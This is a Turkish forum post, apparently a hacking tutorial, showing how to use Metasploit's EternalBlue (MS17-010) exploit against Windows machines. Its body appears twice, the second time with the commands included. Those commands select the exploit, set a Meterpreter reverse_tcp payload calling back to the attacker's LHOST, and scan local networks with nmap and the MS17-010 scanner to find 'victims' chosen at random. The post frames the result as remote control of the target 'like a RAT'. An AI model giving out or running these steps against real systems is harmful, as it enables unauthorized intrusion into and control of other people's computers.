Merhaba Dostlar!
Yeni bir konu ile karşınızdayım. Remote exploitler çok merak edilen bir konu ancak nasıl yapılacağı çok bilinmiyor.EternalBlue da o exploitlerden biri. Şimdi diyorsunuzki Remote exploit ne peki?
Remote Exploit: Adından da anlaşılacağı gibi uzak sistemlere yapılan Exploit türü diyebiliriz.
Exploit nedir bilmeyenler için bu linkten ulaşabilirsiniz.
EternalBlue, herkes tarafından bilinen Wannacry saldırısına sebep olan açıktır.
Bulunan sistemlerde açık muhakkak kapatılmalıdır kötü sonuçlar çıkabilir.
Evet peki bunu nasıl kullanırız diye soracaksınız.Öncelikle size ****sploit gerekli.Kali,Parrot,backtrack gibi işletim sistemlerinde zaten yüklü gelmektedir. ****sploit nedir ve kurulumu için yine Ceys komutanımızın bu konusundan inceleyebilirsiniz.
Konumuza geçelim...
Öncelikle terminalimize gelip msfconsole yazıyoruz ardından açılana kadar bekliyoruz.
Gelen ekrana
yazıyoruz.
Ardından eğer ki ratlardaki gibi kullanmak istiyorsanız şu komutu yazın.
Eğer shell olarak kullanmak istiyorsanız bunu yazmanıza gerek yok.
Eğer bu payloadu yazdıysanız ardından şu komutuda girmeniz gerekli
Evet tekrar ikisininde birleştiği yerdeyiz.
Kurbanımızın ipv4 adresini biliyorsak
eğer rastgele ağdan birini sçecekseniz veya ağdaki bilgisayarları görmek istiyorsanız farklı bir terminal açıp nmapin şu komutuyla bakabilirsiniz.
Veya şu yöntemide deneyebilirsiniz:
İlk başta
diyip
burada beklerseniz açıklı ve açıksız makine olan ve olmayan makineleri söyleyecektir.
Ve yine RHOSTTAN sonraki yere kurbanınızı yazabilirsiniz.
Ardından exploit yazıp kurbanınızın düşmesini bekleyebilirsiniz ve aynı rat kurmuşcasına sistem üzerinde iş yapabilirsiniz.
Bende açıklı makine olmadığından gösteremeyeceğim.Ancak devamında meterpreter ekranı açılacak ve rat şeklinde kullanabileceksiniz.
NOT:
Windows 8 exploiti ayrıdır onun için
ile aynı şekilde kullanabilirsiniz.
Yeni bir konu ile karşınızdayım. Remote exploitler çok merak edilen bir konu ancak nasıl yapılacağı çok bilinmiyor.EternalBlue da o exploitlerden biri. Şimdi diyorsunuzki Remote exploit ne peki?
Remote Exploit: Adından da anlaşılacağı gibi uzak sistemlere yapılan Exploit türü diyebiliriz.
Exploit nedir bilmeyenler için bu linkten ulaşabilirsiniz.
EternalBlue, herkes tarafından bilinen Wannacry saldırısına sebep olan açıktır.
Bulunan sistemlerde açık muhakkak kapatılmalıdır kötü sonuçlar çıkabilir.
Evet peki bunu nasıl kullanırız diye soracaksınız.Öncelikle size ****sploit gerekli.Kali,Parrot,backtrack gibi işletim sistemlerinde zaten yüklü gelmektedir. ****sploit nedir ve kurulumu için yine Ceys komutanımızın bu konusundan inceleyebilirsiniz.
Konumuza geçelim...
Öncelikle terminalimize gelip msfconsole yazıyoruz ardından açılana kadar bekliyoruz.
Gelen ekrana
Kod:
use exploit/windows/smb/ms17_010_eternalblueArdından eğer ki ratlardaki gibi kullanmak istiyorsanız şu komutu yazın.
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcpEğer shell olarak kullanmak istiyorsanız bunu yazmanıza gerek yok.
Eğer bu payloadu yazdıysanız ardından şu komutuda girmeniz gerekli
Kod:
set LHOST ipv4_adresinizEvet tekrar ikisininde birleştiği yerdeyiz.
Kurbanımızın ipv4 adresini biliyorsak
Kod:
set RHOST kurabnın ipv4_adresieğer rastgele ağdan birini sçecekseniz veya ağdaki bilgisayarları görmek istiyorsanız farklı bir terminal açıp nmapin şu komutuyla bakabilirsiniz.
Kod:
nmap 192.168.1.0/24İlk başta
Kod:
use auxiliary/scanner/smb/smb_ms17_010diyip
Kod:
set RHOST IP_ARALIGI
Örneğin set RHOST 192.168.1.0/24
ardından run deyin.Ve yine RHOSTTAN sonraki yere kurbanınızı yazabilirsiniz.
Ardından exploit yazıp kurbanınızın düşmesini bekleyebilirsiniz ve aynı rat kurmuşcasına sistem üzerinde iş yapabilirsiniz.
Bende açıklı makine olmadığından gösteremeyeceğim.Ancak devamında meterpreter ekranı açılacak ve rat şeklinde kullanabileceksiniz.
NOT:
Windows 8 exploiti ayrıdır onun için
Kod:
use exploit/windows/smb/ms17_010_eternalblue_win8
Son düzenleme: